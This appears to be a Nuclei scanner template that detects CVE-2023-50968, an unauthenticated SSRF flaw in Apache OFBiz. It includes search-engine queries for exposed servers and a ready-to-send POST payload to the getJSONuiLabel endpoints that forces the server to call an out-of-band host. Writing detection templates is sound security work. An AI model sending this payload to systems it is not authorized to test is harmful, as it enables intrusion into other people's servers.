id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  impact: |
    Unauthenticated attackers can read arbitrary file properties and perform SSRF attacks, potentially accessing sensitive internal resources or configuration files.
  remediation: |
    Upgrade Apache OFBiz to version 18.12.11 or later.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
    - https://issues.apache.org/jira/browse/OFBIZ-12875
    - https://ofbiz.apache.org/download.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50968
    cwe-id: CWE-918,CWE-200
    epss-score: 0.83897
    epss-percentile: 0.99311
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2023,apache,ofbiz,ssrf,vkev,vuln
variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}

    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray

      parameter:
        - requiredLabel
        - requiredLabels

    attack: clusterbomb
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4b0a00483046022100824d7ead3a84c248b082b47480bff1b2c8d4336b5eb307b337590a075ed10b36022100ab26bb9e97a725df825acab1cb324ea61c031dc1c564518a3a4bd78085b1b02b:922c64590222798bb761d5b6d8e72950